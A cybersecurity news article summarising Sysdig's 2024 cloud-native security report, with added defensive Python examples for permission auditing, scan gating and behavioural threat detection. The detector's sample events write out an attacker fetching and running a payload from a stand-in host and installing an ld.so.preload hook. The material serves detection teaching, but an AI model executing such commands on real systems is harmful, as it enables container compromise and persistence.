SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers

Cloud-native security: Best practices vs. convenience and speed

Wed, 20th Mar 2024

New research has identified a concerning trend among organisations worldwide developing cloud-native applications: security and best practices are being sacrificed in favour of speed and convenience.

As the APAC region faces uncertain times and economic headwinds, the temptation to cut corners and shave costs off a development project is likely to increase. However, this must constantly be balanced with the ever-growing threat of cyber risk, especially in light of recent high-profile attacks in the region and the abundance of new technology empowering bad actors.

Sysdig's seventh annual Cloud-Native Security and Usage Report identifies how customers are developing, using, and securing cloud-native applications and environments by analysing data from millions of containers and thousands of accounts. 

The report has identified several critical areas that need to be evaluated in order to secure cloud-native development and help provide a strict, well-governed roadmap for reducing cyber risk from planning and development through to the everyday running of applications.

Identity neglect: A call to action

"Though I am unsurprised by the apprehension around the security of new technologies like AI, I am disheartened by the massive number of excessive permissions being administered, especially for machine identities. It feels a bit like obsessing over a plane crash while regularly running stop signs with no seatbelt on."
- Anna Belak, Director, Office of Cybersecurity Strategy at Sysdig

Identity management has become the most overlooked cloud attack risk. Only two percent of granted permissions are actually used, a figure that fell year-over-year. Nonhuman identities (applications, tools and services) are granted thousands of permissions at initial implementation that are never disabled or de-provisioned. These excessive permissions create risk that is simply unnecessary. Most well-known security incidents with material impact have been linked to poor management of identities and privileges, and yet only 20% of cloud-native application protection platform (CNAPP) users are prioritising cloud infrastructure entitlements management (CIEM) functions weekly.
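The "granted versus used" gap above is measurable. The following is an added example, not code from Sysdig or the report: it expands an IAM-style policy into concrete actions, compares them against the actions an audit log actually recorded for that identity, flags unused high-risk grants, and emits a policy scoped to what was observed. The action catalogue, the high-risk list, the policy and the observed actions are all constructed for the illustration; a real review would pull the catalogue from the provider's action list and the observed set from ninety days or so of audit events.

```python
from fnmatch import fnmatchcase

# Constructed catalogue of the concrete actions each service exposes. A real review
# pulls this from the provider's published action list; this subset is an assumption.
ACTION_CATALOGUE = {
    "s3": ["s3:GetObject", "s3:PutObject", "s3:DeleteObject", "s3:ListBucket",
           "s3:PutBucketPolicy", "s3:DeleteBucket"],
    "ec2": ["ec2:DescribeInstances", "ec2:RunInstances", "ec2:TerminateInstances",
            "ec2:CreateSecurityGroup", "ec2:AuthorizeSecurityGroupIngress"],
    "iam": ["iam:PassRole", "iam:CreateUser", "iam:AttachUserPolicy"],
    "logs": ["logs:CreateLogStream", "logs:PutLogEvents", "logs:DeleteLogGroup"],
}

# Actions that let a workload identity widen its own or others' privileges; an
# unused grant of one of these is the first thing to revoke (assumed list).
HIGH_RISK_ACTIONS = {"iam:PassRole", "iam:CreateUser", "iam:AttachUserPolicy",
                     "s3:PutBucketPolicy", "ec2:AuthorizeSecurityGroupIngress"}

# Constructed example: the policy attached to a CI build role at onboarding time.
GRANTED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*"], "Resource": "*"},
        {"Effect": "Allow", "Action": ["ec2:*", "iam:PassRole"], "Resource": "*"},
        {"Effect": "Allow", "Action": "logs:*", "Resource": "*"},
    ],
}

# Constructed example: the actions that identity was actually seen calling in
# audit logs over the review window.
OBSERVED_ACTIONS = {"s3:GetObject", "s3:PutObject",
                    "logs:CreateLogStream", "logs:PutLogEvents"}


def expand_granted(policy):
    """Expand every Allow statement's action patterns into concrete actions."""
    granted = set()
    for stmt in policy["Statement"]:
        if stmt.get("Effect") != "Allow":
            continue
        patterns = stmt["Action"]
        if isinstance(patterns, str):
            patterns = [patterns]
        for pattern in patterns:
            service = pattern.split(":", 1)[0]
            for action in ACTION_CATALOGUE.get(service, []):
                if fnmatchcase(action, pattern):
                    granted.add(action)
    return granted


def usage_report(policy, observed):
    """Compare what was granted with what was used; the gap is attack surface."""
    granted = expand_granted(policy)
    used = granted & set(observed)
    unused = granted - used
    return {
        "granted": len(granted),
        "used": len(used),
        "usage_ratio": len(used) / len(granted) if granted else 0.0,
        "unused": sorted(unused),
        "high_risk_unused": sorted(unused & HIGH_RISK_ACTIONS),
        # Used but never granted here: comes from another attached policy, worth tracing.
        "used_not_granted": sorted(set(observed) - granted),
    }


def least_privilege_policy(observed):
    """Rewrite the grant to exactly the observed actions. Resource stays at "*"
    here; scoping it to the specific buckets and log groups is the next step."""
    return {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": sorted(observed), "Resource": "*"}],
    }


if __name__ == "__main__":
    report = usage_report(GRANTED_POLICY, OBSERVED_ACTIONS)
    print(f"used {report['used']} of {report['granted']} granted actions "
          f"({report['usage_ratio']:.0%}); high-risk unused: {report['high_risk_unused']}")
    print(least_privilege_policy(OBSERVED_ACTIONS))
```

On the constructed data the identity uses four of fifteen granted actions, and three of the unused ones (PassRole, bucket-policy writes, security-group ingress changes) are exactly the kind of grant an attacker who lands in the build environment would reach for.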

Keep shifting left, we aren't there yet

After a year of organisations prioritising the remediation of critical and high vulnerabilities in packages actually in use at runtime, the prevalence of such vulnerabilities has fallen by nearly 50%. However, the goal of shift-left is to scan for, identify and remediate vulnerabilities in the pre-delivery pipeline, before runtime, and the research suggests this is still not happening. The report found a higher policy failure rate in runtime scans than in continuous integration and continuous delivery (CI/CD) build pipeline scans. If organisations were applying shift-left with fidelity, we would expect the opposite: policy failures are meant to be caught before delivery, before they become exploitable conditions for attackers.
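One way to see why a runtime failure rate above the CI failure rate points at a broken gate: apply the same policy at both stages and split the runtime violations into those CI already saw (and should have blocked) and those that genuinely appeared after delivery. The code below is an added example, not Sysdig's or the report's; the scan results, the SAMPLE-nnnn identifiers and the policy thresholds are constructed for the illustration. The `in_use` flag stands in for the runtime-only knowledge of whether the vulnerable package was loaded by a running process, which is what lets runtime remediation be prioritised.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    vuln_id: str          # constructed identifiers, not real advisories
    package: str
    severity: str         # CRITICAL, HIGH, MEDIUM, LOW
    fix_available: bool
    in_use: bool = False  # runtime-only signal: package loaded by a running process


SEVERITY_RANK = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3}

# The one policy both stages share: block on critical/high findings that have a fix.
POLICY = {"block_severities": {"CRITICAL", "HIGH"}, "require_fix": True}


def evaluate(findings, policy=POLICY):
    """Apply the policy to a scan result; a non-empty violation list fails the gate."""
    violations = [
        f for f in findings
        if f.severity in policy["block_severities"]
        and (f.fix_available or not policy["require_fix"])
    ]
    return {"passed": not violations, "violations": violations}


def ci_gate(findings):
    """Return the build verdict as a CI job would; a failed gate never ships the image."""
    return 0 if evaluate(findings)["passed"] else 1


def escaped_to_runtime(ci_findings, runtime_findings):
    """Split runtime violations into those CI saw (and should have blocked) and those
    that first appeared after delivery (new advisory, or a package added post-build)."""
    seen_in_ci = {f.vuln_id for f in ci_findings}
    runtime_violations = evaluate(runtime_findings)["violations"]
    return {
        "should_have_blocked": [f.vuln_id for f in runtime_violations if f.vuln_id in seen_in_ci],
        "new_at_runtime": [f.vuln_id for f in runtime_violations if f.vuln_id not in seen_in_ci],
    }


def runtime_priority(findings):
    """Order remediation work: packages actually loaded at runtime first, then severity."""
    return sorted(findings, key=lambda f: (not f.in_use, SEVERITY_RANK[f.severity]))


# Constructed sample: what the CI scanner reported for an image build ...
CI_SCAN = [
    Finding("SAMPLE-0001", "openssl", "HIGH", fix_available=True),
    Finding("SAMPLE-0002", "libxml2", "MEDIUM", fix_available=True),
    Finding("SAMPLE-0003", "zlib", "HIGH", fix_available=False),
]

# ... and what the runtime scanner later reported for the same image in production.
RUNTIME_SCAN = [
    Finding("SAMPLE-0001", "openssl", "HIGH", fix_available=True, in_use=True),
    Finding("SAMPLE-0003", "zlib", "HIGH", fix_available=False, in_use=False),
    Finding("SAMPLE-0004", "curl", "CRITICAL", fix_available=True, in_use=False),
]

if __name__ == "__main__":
    print("CI gate exit code:", ci_gate(CI_SCAN))
    print("escaped:", escaped_to_runtime(CI_SCAN, RUNTIME_SCAN))
    print("fix first:", [f.vuln_id for f in runtime_priority(RUNTIME_SCAN)])
```

With the constructed data the CI gate returns a non-zero exit code, so SAMPLE-0001 reaching production means the gate was skipped or overridden; SAMPLE-0004 is the legitimate case a runtime scan exists for. The priority order puts the in-use HIGH finding ahead of the not-in-use CRITICAL one, which is the runtime-first prioritisation the report credits with the 50% reduction.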

Threat detection advancing toward maturity

The vast majority of Sysdig customers are using threat detection and response (TDR) insights weekly, and the development and testing of custom behavioural detections points to a maturing practice. This year's report shows that only 35% of attacks were identified using indicators of compromise (IoCs), while the remaining 65% were identified with behaviour-based detections. The most commonly triggered detections this year, defence evasion and privilege escalation, fell under the initial access and execution MITRE ATT&CK tactics, which often present earlier in an attack lifecycle than those the report saw last year.
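The IoC versus behaviour split is easiest to see on concrete events. Below is an added example, not Sysdig's detection content or the report's data: a minimal detector that runs one hash-based IoC match and two behavioural rules over a constructed sequence of container process events, then tallies how many alerts each method produced. The event shape, the placeholder hash, the rule set and the ATT&CK tactic labels attached to each rule are all assumptions made for the illustration.

```python
from dataclasses import dataclass


@dataclass
class Event:
    """One process event from a container runtime sensor (constructed shape)."""
    container: str
    proc: str
    parent: str
    cmdline: str
    sha256: str = ""       # hash of the executed binary, if the sensor captured it
    file_write: str = ""   # path written by the process, if any


# Constructed IoC list; the hash is a placeholder, not a real sample.
KNOWN_BAD_SHA256 = {"0" * 63 + "1": "constructed cryptominer binary"}

SHELLS = {"sh", "bash", "dash", "zsh"}
WEB_SERVERS = {"nginx", "httpd", "node", "gunicorn", "java"}


def rule_shell_from_web_server(e):
    # Behavioural: a web server worker should never spawn an interactive shell.
    return e.proc in SHELLS and e.parent in WEB_SERVERS


def rule_ld_preload_write(e):
    # Behavioural: writing /etc/ld.so.preload hijacks every later exec in the container.
    return e.file_write == "/etc/ld.so.preload"


# Tactic labels are this example's own mapping, chosen for illustration.
BEHAVIOUR_RULES = [
    ("shell spawned by web server", "Execution", rule_shell_from_web_server),
    ("write to /etc/ld.so.preload", "Defense Evasion", rule_ld_preload_write),
]


def detect(events):
    """Run IoC matching and behavioural rules over events; return one alert per hit."""
    alerts = []
    for e in events:
        if e.sha256 and e.sha256 in KNOWN_BAD_SHA256:
            alerts.append({"container": e.container, "method": "ioc",
                           "rule": "known-bad hash: " + KNOWN_BAD_SHA256[e.sha256],
                           "tactic": "n/a"})
        for name, tactic, predicate in BEHAVIOUR_RULES:
            if predicate(e):
                alerts.append({"container": e.container, "method": "behaviour",
                               "rule": name, "tactic": tactic})
    return alerts


def method_share(alerts):
    """How many alerts came from IoCs versus behaviour, as counts and a percentage."""
    total = len(alerts)
    ioc = sum(1 for a in alerts if a["method"] == "ioc")
    behaviour = total - ioc
    return {"ioc": ioc, "behaviour": behaviour,
            "behaviour_pct": round(100 * behaviour / total) if total else 0}


# Constructed sample: a web container compromised through its application, the
# attacker pulling a payload, running it, and installing a preload hook.
SAMPLE_EVENTS = [
    Event("web-7f3", "nginx", "containerd-shim", "nginx: worker process"),
    Event("web-7f3", "sh", "nginx", "sh -c 'curl -s http://example.invalid/x -o /tmp/x'"),
    Event("web-7f3", "curl", "sh", "curl -s http://example.invalid/x -o /tmp/x"),
    Event("web-7f3", "x", "sh", "/tmp/x", sha256="0" * 63 + "1"),
    # File-write events in this constructed shape carry no binary hash.
    Event("web-7f3", "x", "sh", "/tmp/x --install", file_write="/etc/ld.so.preload"),
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(a["method"], "|", a["tactic"], "|", a["rule"])
    print(method_share(found))
```

Note the ordering: the behavioural rule fires on the second event, when the shell appears, while the IoC only matches two events later once a hashed binary executes; and the IoC match depends on the attacker reusing a known binary, whereas the shell and preload rules would fire on a payload nobody has catalogued yet.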

Ephemerality won't save you from an attack

We've seen container lifespans shrink over the last several years, to the point that 70% of containers live less than five minutes. There is some comfort in knowing that a vulnerable container is short-lived. However, Sysdig's Threat Research Team (TRT) stated in the 2023 Global Cloud Threat Report that a cloud attack takes only 10 minutes. With automation, an attacker can enter through a vulnerable container and move laterally before the end of its lifespan. Running vulnerable workloads, however short-lived, leaves an organisation at risk of attack.

AI adoption paradox

While most of the report's findings this year indicate that organisations choose convenience and speed over more secure practices, we could not attribute this to enterprise AI use. 31% of companies have implemented AI frameworks and packages, but only 15% of these are generative AI. Put simply, most of the AI packages we see right now are used for data correlation and analysis.

Conclusion

From the real-world customer data gathered and analysed, we see an evolving cloud security landscape full of both successes and struggles. Skirting security best practices might let organisations work with fewer barriers, but it also puts them at far greater risk of attack. For instance, a lack of identity management has been behind many high-profile material attacks. Conversely, prioritising runtime security and TDR is reducing vulnerabilities and advancing detection efforts.

Short-lived workloads are no match for attackers using automation, and it seems that enterprises aren't yet quite ready to implement AI in cloud environments.